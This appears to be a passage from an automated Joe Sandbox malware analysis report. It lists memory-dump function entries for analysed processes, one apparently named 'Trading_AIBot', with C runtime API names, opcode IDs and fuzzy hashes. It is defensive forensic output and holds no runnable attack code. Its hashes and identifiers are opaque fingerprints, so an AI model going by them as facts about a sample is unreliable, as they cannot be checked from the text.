                                                                                                                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2395185920-0
                                                                                                                              • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                              • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                              • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                              • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _fseek_malloc_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 208892515-0
                                                                                                                              • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                              • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                              • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                              • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                              APIs
                                                                                                                              • __flush.LIBCMT ref: 0040BB6E
                                                                                                                              • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                              • __locking.LIBCMT ref: 0040BB95
                                                                                                                              • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3240763771-0
                                                                                                                              • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                              • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                              • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                              • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                              APIs
                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                              • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3058430110-0
                                                                                                                              • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                              • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                              • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                              • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3016257755-0
                                                                                                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                              • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                              • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 84afd88f2905bfba2bf86351ee571d458a60881339dc694f691a84f5cf29b82b
                                                                                                                              • Instruction ID: 8d08e575e990017db87772caf91e849b0646785c7218ed305cebd93455a14614
                                                                                                                              • Opcode Fuzzy Hash: 84afd88f2905bfba2bf86351ee571d458a60881339dc694f691a84f5cf29b82b
                                                                                                                              • Instruction Fuzzy Hash: 18710175D00219CFDB14EFA4D890AADBBB2FF89300F6081A9D449BB264DB716D4ACF44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 55dd00b54425cb8fae20a678527739576e50bc87dae72bd218d0c8c4fba34a78
                                                                                                                              • Instruction ID: 4dafc9a4f8ebed79fb0b8a9218a63b3f5abb91380513b7a5ab34bb56aa85b60e
                                                                                                                              • Opcode Fuzzy Hash: 55dd00b54425cb8fae20a678527739576e50bc87dae72bd218d0c8c4fba34a78
                                                                                                                              • Instruction Fuzzy Hash: A661E174D00219CFDB15EFA4D990AADBBB2FF89300F608169D409BB264DB716D4ACF44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0790aefd12aa961ed1b8d17d4854b7472833f7b5457ca0d3bc39763c6fa222c6
                                                                                                                              • Instruction ID: 48fb1c4eefc51df8b2c7efca5db15421f647c5ddd8e619ef17dc7c20e3208f94
                                                                                                                              • Opcode Fuzzy Hash: 0790aefd12aa961ed1b8d17d4854b7472833f7b5457ca0d3bc39763c6fa222c6
                                                                                                                              • Instruction Fuzzy Hash: AE61C478A00248CFCB48DFA9D594EADBBB2FF49310F109169E915AB365DB31AC46CF14
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1f890c1be096224f0b85f57de90d7feec2fa9f24f0ceb8abf5ec8aaaa533bcf6
                                                                                                                              • Instruction ID: e42ddb15cb35e893c9de0cee82d9a1c78fe43390e69bcff876ca2eb8d5259ecb
                                                                                                                              • Opcode Fuzzy Hash: 1f890c1be096224f0b85f57de90d7feec2fa9f24f0ceb8abf5ec8aaaa533bcf6
                                                                                                                              • Instruction Fuzzy Hash: 0041CCB4D00248DFDB14DFEAD984A9EFBB6BF48304F24802AE409BB250D7749946CF54
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: db8af9fe895ce8fe5b0cb6427af4822e4722ae8c001859e742390c188877f03f
                                                                                                                              • Instruction ID: 5aa32aa218097952ad92604fa462cb2239fbccfc4071747386a06f97503121ff
                                                                                                                              • Opcode Fuzzy Hash: db8af9fe895ce8fe5b0cb6427af4822e4722ae8c001859e742390c188877f03f
                                                                                                                              • Instruction Fuzzy Hash: 1041BCB4D00248DFDB14DFEAD984A9EFBB6BF48304F24802AE419BB254D7749946CF54
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a0fc982cd48285d4069ec9aa536abf3effd053fc674146a742669959e5fa71cd
                                                                                                                              • Instruction ID: 36f387ba064440e783c80e807bfe9c62ccd6644a6b5dbb7f62b13525b39295d3
                                                                                                                              • Opcode Fuzzy Hash: a0fc982cd48285d4069ec9aa536abf3effd053fc674146a742669959e5fa71cd
                                                                                                                              • Instruction Fuzzy Hash: 11012834D00209CFDB10EFA9C4547ADFBB1BF49314F208419D005FB290CBB89986CB54
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2f5632a907cda75e5ddfbf40e6bd141aeb63f2ea0b7fdca670eb4964613528d0
                                                                                                                              • Instruction ID: 0ea2199ea6d13ff7fb48f328e943af11990168f953d85a0f09a971a5a2e9cf41
                                                                                                                              • Opcode Fuzzy Hash: 2f5632a907cda75e5ddfbf40e6bd141aeb63f2ea0b7fdca670eb4964613528d0
                                                                                                                              • Instruction Fuzzy Hash: 5EB2C07090131ACFDB68EF64C894BADB7B2BB89300F5084E9D44DAB664DB715E82DF44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0145feb4b9c036764ddba6b3f92f07f57e3b5bbdf666fa0a1b7c13244254e529
                                                                                                                              • Instruction ID: 09b275ca3a778973144504e7fcc02008c51f8aa780487474f390ec5038472183
                                                                                                                              • Opcode Fuzzy Hash: 0145feb4b9c036764ddba6b3f92f07f57e3b5bbdf666fa0a1b7c13244254e529
                                                                                                                              • Instruction Fuzzy Hash: 93B2C07091131ACFCB68EF64C894BADB7B2BB89300F5084E9D44DAB664DB715E82DF44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3e8eaa8bef03afc6cee0701a8cebda78bb23f35be05ce281c45279ba2b34386c
                                                                                                                              • Instruction ID: 11005a5e6a8084c69d1c388089cd6ec5fe21f4834f6a23da27ade8a49dc30834
                                                                                                                              • Opcode Fuzzy Hash: 3e8eaa8bef03afc6cee0701a8cebda78bb23f35be05ce281c45279ba2b34386c
                                                                                                                              • Instruction Fuzzy Hash: A862BFB0901219CFDB68EF64D994BAEBBB2BF49301F1080E9D509AB365DB315E85DF40
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7d716319c32a92a42766d651dfc3a4e21a0c0da9dd1088459e5ec282e9fe5247
                                                                                                                              • Instruction ID: 51e810ab80d9487aa307f569891c62357eb345f05e992f86efb5a6fc73877f77
                                                                                                                              • Opcode Fuzzy Hash: 7d716319c32a92a42766d651dfc3a4e21a0c0da9dd1088459e5ec282e9fe5247
                                                                                                                              • Instruction Fuzzy Hash: 5062BEB0901219CFDB68EF64D994BAEBBB2BF49301F1080E9D509AB365DB315E85DF40
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 56985a9d603f661961c1fc5b7beecabeb796b4cadb211ff3c78453695aca4562
                                                                                                                              • Instruction ID: 5475f4b5ad72e7694bcf339d8c4a56bbe15f9cc3ff12a8be95f2cfaf61f889f9
                                                                                                                              • Opcode Fuzzy Hash: 56985a9d603f661961c1fc5b7beecabeb796b4cadb211ff3c78453695aca4562
                                                                                                                              • Instruction Fuzzy Hash: A4410675E012088FDB04DFA5D894BEEBBB2FF89301F108069E516B72A1DB719941CF54
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8eb3154ad862f6eea628f7a59fa6b45ef6a49b4e7df57177c9b4c6821b6b31a7
                                                                                                                              • Instruction ID: 0539d6cc1d3a86e8d57e8d24edfe4fc4360c46d765933ea6052b512ce43f7973
                                                                                                                              • Opcode Fuzzy Hash: 8eb3154ad862f6eea628f7a59fa6b45ef6a49b4e7df57177c9b4c6821b6b31a7
                                                                                                                              • Instruction Fuzzy Hash: 3161F774A00258CFCB05DFA9D994E9DBBB2FF4A310F1181A9E515AB365DB30AC06CF14
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a8b385ebff69f361b4cb2e5e366b1c85ad4f1ea35a129f48f3d0e6e633f2d5ef
                                                                                                                              • Instruction ID: 902c035153847f6963cacdddd309945950f603cf43763a4892b89c37d84ce280
                                                                                                                              • Opcode Fuzzy Hash: a8b385ebff69f361b4cb2e5e366b1c85ad4f1ea35a129f48f3d0e6e633f2d5ef
                                                                                                                              • Instruction Fuzzy Hash: B6B1DC74A01229CFDB64EF68C994B9DB7B2BB49304F1085EAD40DA7350DB71AE85CF10
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e3d09a0031319c01b58142d4877db9f5a7ca2ac2838018c03ff1383a20abeec0
                                                                                                                              • Instruction ID: faa1f0515c11893000d25a64f0a7f12cf4698ab5e767a6fd946b23fedc9c1861
                                                                                                                              • Opcode Fuzzy Hash: e3d09a0031319c01b58142d4877db9f5a7ca2ac2838018c03ff1383a20abeec0
                                                                                                                              • Instruction Fuzzy Hash: E141E075D002489FDB14DFE9D884AEEFBB2BF89310F24806AE409BB254DB709946CF54
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c9d1b4a871bb03ab707a40eb5179c6ea420d3d9e9bba5fd43fbdc68a9ba0e8cc
                                                                                                                              • Instruction ID: 0243ee7abcb86d8745e0781ed28a00e50d5f30b3a524d0124bd8bf8ee1aeee21
                                                                                                                              • Opcode Fuzzy Hash: c9d1b4a871bb03ab707a40eb5179c6ea420d3d9e9bba5fd43fbdc68a9ba0e8cc
                                                                                                                              • Instruction Fuzzy Hash: A341AB78D01218CFDF14EFA9D494AADBBF5BB49300F10802AE469BB3A4DB745946CF58
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ee6272d70f1f11295eac4c6f52d739f6a66b8d95bb6bcb8d97d5cde934f76cd8
                                                                                                                              • Instruction ID: 02d0f4e7877c787e19a441c5a2a114c8d072b828e94cfd31925977f56f3c1502
                                                                                                                              • Opcode Fuzzy Hash: ee6272d70f1f11295eac4c6f52d739f6a66b8d95bb6bcb8d97d5cde934f76cd8
                                                                                                                              • Instruction Fuzzy Hash: 6341C475E002089FDB04DFA9D894BEEBBB2BF89301F108069E516B72A0DB759941CF54
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 070b4cb636a5b93ee2d4fe86771c67962d20e84b9097eb2e978c9960eea46255
                                                                                                                              • Instruction ID: 2b750e7e5eb9d2540e5595528a93972a33d46ede1fb451e7f102d097dabc971d
                                                                                                                              • Opcode Fuzzy Hash: 070b4cb636a5b93ee2d4fe86771c67962d20e84b9097eb2e978c9960eea46255
                                                                                                                              • Instruction Fuzzy Hash: 4F41ACB5D002489FDB14DFAAD984A9EFFB5BF48304F24802AE418BB250DB749985CF54
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e82e6871213d7e34a04d093a509b15cb3848fb3bd53a00f8343e6b51ee97b483
                                                                                                                              • Instruction ID: dfe5fac3e0a937cb2c1e07c02bab8295714416613b0b80258e078b3b2f92f7d6
                                                                                                                              • Opcode Fuzzy Hash: e82e6871213d7e34a04d093a509b15cb3848fb3bd53a00f8343e6b51ee97b483
                                                                                                                              • Instruction Fuzzy Hash: 9131E575E0020A8FCB09EFB5C450AEEBBB2AF89300F1095A9D415B7394CB765D46CF54
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2bcc5f77465a89b3b59848027c86ad3e3d21298c0bb62329dab73f15424931d3
                                                                                                                              • Instruction ID: 7674c15521cc97478e5887adb971dda2251a530bfeb88a12019d759aa315f4f1
                                                                                                                              • Opcode Fuzzy Hash: 2bcc5f77465a89b3b59848027c86ad3e3d21298c0bb62329dab73f15424931d3
                                                                                                                              • Instruction Fuzzy Hash: 3F21CE75E0020A8BCB08EBA5D450AEEB7B6BB89300F609469D415B7394DB76AD42CF64
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ad423acc6062a6a9320113104a14b0dcb400f4f8416b9b20ada945759c7ec1c3
                                                                                                                              • Instruction ID: f620f1fa8909a11e084ce3b5563b6c3fd4a74b5bfc39cb6092eba1335fcd902d
                                                                                                                              • Opcode Fuzzy Hash: ad423acc6062a6a9320113104a14b0dcb400f4f8416b9b20ada945759c7ec1c3
                                                                                                                              • Instruction Fuzzy Hash: 8721D4B1C093959FD702AF74896839E7FB1EB07305F0548EBC441A7192D7784648CB96
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0484509436c3d3d3b5821b0516780730ad23b019bc20021b96179f8df3af9fb4
                                                                                                                              • Instruction ID: a0b611c7971eae5a6d354c3d9d3f63d957b2e701b3c1641c8f6660fcdebb6bc4
                                                                                                                              • Opcode Fuzzy Hash: 0484509436c3d3d3b5821b0516780730ad23b019bc20021b96179f8df3af9fb4
                                                                                                                              • Instruction Fuzzy Hash: 4D011AB5C00219DFDB14FFB5C5187AEBBB0FB06306F4198AA8416B3290DBB84684CF95
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2fbe147a600777d54717d4ebc045d2ff04a6db9ae1106cc9a86b770ce520437c
                                                                                                                              • Instruction ID: 467397dc8756d149e68c7f5772b7f35acf427999c6b3d91f7cfe1d32a02f2dfb
                                                                                                                              • Opcode Fuzzy Hash: 2fbe147a600777d54717d4ebc045d2ff04a6db9ae1106cc9a86b770ce520437c
                                                                                                                              • Instruction Fuzzy Hash: EC0162F5D052049FD714EF74E944A5CBFB0EB0A215F1002AAE528A73B2E7708946DB95
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9212692306b8a67395c5bc3378b04aed2e0a1519f229ba88b43e460bc66d35d9
                                                                                                                              • Instruction ID: da9091c386f7e51af79875dab27ae5cf4f2e4afb91bb897082e3b724c9d43ab4
                                                                                                                              • Opcode Fuzzy Hash: 9212692306b8a67395c5bc3378b04aed2e0a1519f229ba88b43e460bc66d35d9
                                                                                                                              • Instruction Fuzzy Hash: 8CF082F49002049FD305EF64D584A5C7FB1FB06209F1100EAD90597372E7319D4ACB51
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7537c452df5a0c5ae16544ad91a3c72f2beb1697fba4eeb96cb20bf5c4cec42f
                                                                                                                              • Instruction ID: 3a403d4b4cedd8b08ce8af88bb35eea4f5b0093481e244c81264cba496ca30e1
                                                                                                                              • Opcode Fuzzy Hash: 7537c452df5a0c5ae16544ad91a3c72f2beb1697fba4eeb96cb20bf5c4cec42f
                                                                                                                              • Instruction Fuzzy Hash: 13F0F8B8900155DFCB68EFA4D5487ACBBB0EF4A312F0464A7D549B7260CB309985CF24
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.2811861552.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_2580000_Trading_AIBot.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ec6b01a710056b7ae0645e9608304b01ccd4b3c77407cd1280e6dea0248b0eba
